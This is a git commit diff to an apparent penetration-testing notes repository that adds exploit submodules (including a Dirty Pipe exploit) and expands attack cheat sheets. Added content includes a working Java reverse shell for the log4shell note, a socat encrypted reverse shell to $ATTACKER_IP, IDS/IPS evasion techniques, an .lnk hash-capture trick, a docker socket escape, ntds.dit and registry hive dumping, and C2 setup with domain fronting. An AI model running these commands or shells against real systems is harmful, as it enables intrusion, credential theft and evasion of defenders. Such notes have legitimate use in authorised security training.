bump

.gitmodules

@@ -139,3 +139,24 @@
 [submodule "exploit/windows/printspoofer"]
 	path = exploit/windows/printspoofer
 	url = https://github.com/dievus/printspoofer.git
+[submodule "post_exploitation/powershell"]
+	path = post_exploitation/powershell
+	url = https://github.com/puckiestyle/powershell.git
+[submodule "enumeration/network_scanners/kotlin-port-scanner"]
+	path = enumeration/network_scanners/kotlin-port-scanner
+	url = https://github.com/Hydragyrum/kotlin-port-scanner.git
+[submodule "exploit/macOS/ds_store_exp"]
+	path = exploit/macOS/ds_store_exp
+	url = https://github.com/lijiejie/ds_store_exp.git
+[submodule "exploit/macOS/DS_Store_crawler_parser"]
+	path = exploit/macOS/DS_Store_crawler_parser
+	url = https://github.com/anantshri/DS_Store_crawler_parser.git
+[submodule "exploit/macOS/Python-dsstore"]
+	path = exploit/macOS/Python-dsstore
+	url = https://github.com/gehaxelt/Python-dsstore.git
+[submodule "post_exploitation/armitage"]
+	path = post_exploitation/armitage
+	url = https://gitlab.com/kalilinux/packages/armitage.git
+[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
+	path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
+	url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git

enumeration/docs/ldap.md

@@ -0,0 +1,15 @@
+# LDAP
+
+## Get Domain
+
+```sh
+ ldapsearch -x -h $TARGET_IP -s base namingcontexts
+```
+
+## Domain Dump
+
+* If a set of credentials are known via
+```sh
+ldapdomaindump $TARGET_IP  -u '<domain>\<user>' -p '<password>' --no-json --no-grep
+```
+* Take a look at the genreated HTML files

enumeration/network_scanners/kotlin-port-scanner

@@ -0,0 +1 @@
+Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e

exfiltration/windows/evil-winrm.md

@@ -1,6 +1,11 @@
 # Evil-winrm
 
+
 * Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
 ```sh
 download C:\Windows\Temp\<file>
 ```
+* The other way
+```
+upload yadayda
+```

exploit/java/log4shell.md

@@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 * A Proxy LDAP server to an HTTP server is needed
 
 * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
-```sh
+```java
 public class Exploit {
     static {
         try {
@@ -48,12 +48,52 @@ public class Exploit {
     }
 }
 ```
+or another one 
+```java 
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {
+    static {
+        String host = "$ATTACKER_IP";
+        int port = 4711;
+        String cmd = "/bin/sh";
+        try {
+            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
+            Socket s = new Socket(host, port);
+            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
+            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
+            while (!s.isClosed()) {
+                while (pi.available() > 0)
+                    so.write(pi.read());
+                while (pe.available() > 0)
+                    so.write(pe.read());
+                while (si.available() > 0)
+                    po.write(si.read());
+                so.flush();
+                po.flush();
+                Thread.sleep(50);
+                try {
+                    p.exitValue();
+                    break;
+                } catch (Exception e) {
+                }
+            }
+            p.destroy();
+            s.close();
+        } catch (Exception e) {
+        }
+    }
+}
+```
+
 * Run the LDAP, HTTP and reverse shell
 ```sh
 java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
 ```
 ```sh
-php -S 0.0.0.:8000
+php -S 0.0.0.0:8000
 ```
 ```sh
 nc -lvnp 4449

exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit

@@ -0,0 +1 @@
+Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330

exploit/macOS/DS_Store_crawler_parser

@@ -0,0 +1 @@
+Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be

exploit/macOS/Python-dsstore

@@ -0,0 +1 @@
+Subproject commit 859781b834244774cb509e96ccc29ee646f72739

exploit/macOS/ds_store_exp

@@ -0,0 +1 @@
+Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7

exploit/windows/docs/lnk_exploit.md

@@ -0,0 +1,14 @@
+# .lnk exploit
+
+* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
+* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
+
+* Target does not even have to open the link directly
+
+```sh 
+mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
+```
+* Start a responder and wait for user's hash
+```sh
+responder -I eth0
+```

misc/hadoop.md

@@ -0,0 +1,57 @@
+# Hadoop
+
+Distributed storage and computing
+* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
+
+## Terminology
+* __Cluster__, forms the datalake
+* __Node__, single host inside the cluster
+* __NameNode__, node that keeps the dir tree of the Hadoop file system
+* __DataNode__, slave node that stores files and is instructed by the NameNode
+* __Primary NameNode__, current active node responsible for keeping the directory structure
+* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
+* __Master Node__, Hadoop management app like HDFS or YARN Manager
+* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
+* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
+* __Kerberised__, security enabled cluster through Kerberos
+
+* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
+* __Hive__, primary DB for structured data
+* __YARN__, scheduling jobs and resource management
+* __MapReduce__, distributed filtering, sorting and reducing 
+* __HUE__, GUI for HDFS and Hive
+* __Zookeeper__, cluster management
+* __Kafka__, message broker
+* __Ranger__, privileged ACL
+* __Zeppelin__, data analytivs inside a webUI
+
+## Zeppelin
+
+* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
+* Try execution inside notebooks
+
+## Ktabs
+
+* Finding `ktpass`es to authenticate at the kerberos TGS
+* Output principals and use them to init
+```sh
+klist -k <keytabfile>
+kinit <prinicpal name> -k -V -t <keytabfile>
+```
+
+## HDFS
+
+* User the `hdfs` utility to enumerate the distributed network storage
+```sh
+hdfs dfs -ls /
+```
+* Current user and user on the storage do not have to correspond
+* Touched files on the storage may be owned by root
+```sh
+hdfs dfs -touchz  testfile /tmp/testfile
+hdfs dfs -ls /tmp
+```
+* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission
+
+
+

misc/level3_hypervisor/docker_sec/docker.md

@@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
 ```sh
 curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
 ```
-* Login in to the host via ssh
+* Login in to the host via ssh remotely or socat locally
+```sh
+socat - UNIX-CONNECT:/var/run/docker.sock
+POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+Host:
+Connection: Upgrade
+Upgrade: tcp
+
+HTTP/1.1 101 UPGRADED
+Content-Type: application/vnd.docker.raw-stream
+Connection: Upgrade
+Upgrade: tcp
+```
+
 ## Escape through DB
 
 * Login into DB

pivoting.md

@@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<J
     ```sh
     puttygen <keyfile> -o key.ppk
     ```
+* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) 
+```sh
+echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
+```
 
 ### Socat
 * Reverse shell on target via

post_exploitation/armitage

@@ -0,0 +1 @@
+Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6

post_exploitation/docs/c2.md

@@ -2,3 +2,44 @@
 
 * [Matrix](https://www.thec2matrix.com/)
 * [bcsecurity](https://www.bc-security.org/) maintains Empire 4
+* [Empire](https://github.com/BC-SECURITY/Empire.git)
+* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
+* [Covenant](https://github.com/cobbr/Covenant)
+* [Sliver](https://github.com/BishopFox/sliver)
+
+* Server
+    * Listener
+* Payloads/Agents
+    * Staged/Dropper
+    * Stageless
+* Beacons from Agents, disguised through jitter
+* Modules
+    * Post Exploitation
+    * Pivoting
+
+## Domain Fronting
+
+* Use a Domain on the C2 server 
+* User Cloudflare to proxy the request and responses to and from the target
+* Use HTTPs for channel encryption
+
+## Profiles
+
+* Server evaluates by custom user-agents to identify agents
+
+## Types
+
+* Std listener, TCP or UDP
+* HTTP/HTTPS, counter FW
+* DNS, if internet access of the target is flaky
+* SMB, counter network segments
+
+## Redirector
+
+* Apache or nginx as reverse proxy in front of the  c2 server
+* FW is still needed in front of the redirector
+* These get burned instead of the c2
+
+
+
+

post_exploitation/docs/ids_ips_evation.md

@@ -0,0 +1,79 @@
+# IDS & IPS Evation
+
+* Evation by manipulation of 
+    * Protocol
+    * Payload
+    * Route
+    * Or DoS
+
+## Protocol Manipulation
+
+### Relying on another protocol
+* `nc -ulvnp 4711` for listening to incoming UDP traffic
+* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
+
+### Manipulation of the source's or LHOST's network port
+* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
+
+### Session splicing by fragmentation and segmentation
+* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU  
+* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
+
+### Sending invalid packets
+* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
+* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
+
+## Payload Manipulation
+
+### Obfuscation and Encoding
+* Base64 
+* URL
+* Escaped Unicode Characters
+
+### Encrypting Communication Channels
+* Use socat with encryption 
+```sh
+openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
+```
+* Create `.pem` (Privacy Enhanced Mail) file via
+```
+cat id_rsa.key reverse.crt > reverse.pem
+```
+* Listening on attacker side
+```sh
+socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
+```
+* On target 
+```sh
+socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
+```
+
+### Modification of Data
+* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
+* Adding whitespaces to the commands
+* Use aliases
+
+## Route Manipulation
+
+### Relying on Source Routing
+* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
+* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
+
+### Using Proxyy Servers
+* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
+
+## Tactical DoS
+* Non malicious, benign traffic against 
+    * IDS/IPS
+    * Logging server
+
+## MISC
+
+* Changing 
+    * `User-Agent`
+    * Request frequency and duration of sleep 
+    * SSL/TLS certs
+    * DNS beacon, storing exfiltrated data in the query
+
+
+

post_exploitation/docs/metasploit.md

@@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
 run -j
 ```
 * Copy into powershell/cmd
+
+
+## Reverse Proxy
+
+* Hide behind reverse proxy, e.g. apache
+* In case of an apache, these modules must be enabled
+    * rewrite
+    * proxy
+    * proxy_http
+    * headers
+* Use `User-Agent` to identify targets
+```ucl
+<VirtualHost *:80>
+
+	ServerAdmin webmaster@localhost
+	DocumentRoot /var/www/html
+
+	RewriteEngine On
+	RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
+	ProxyPass "/" "http://localhost:8080/"
+
+	<Directory>
+		AllowOverride All
+	</Directory>
+
+	ErrorLog ${APACHE_LOG_DIR}/error.log
+	CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+</VirtualHost>
+```

post_exploitation/docs/windows/sebackupprivilege.md

@@ -6,21 +6,21 @@
 * Check `whoami /all`
 * `SeBackupPrivilege` must be present
 * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
-* Upload `diskshadow.txt` to the target with the following content
+* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
 ```sh
 set metadata C:\tmp\tmp.cabs 
 set context persistent nowriters 
 add volume c: alias someAlias 
 create 
-expose %someAlias% h:
+expose %someAlias% h: 
 ```
-* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
+* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
 * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
 ```sh
 import-module .\SeBackupPrivilegeUtils.dll
 import-module .\SeBackupPrivilegeCmdLets.dll
 copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
-reg save HKLM\SYSTEM C:\Path\to\uploads\system
+reg save HKLM\SYSTEM C:\tmp\system
 ```
 * Downloads the files `ntds.dit` and `system`
 * Extract the hashes via

post_exploitation/powershell

@@ -0,0 +1 @@
+Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b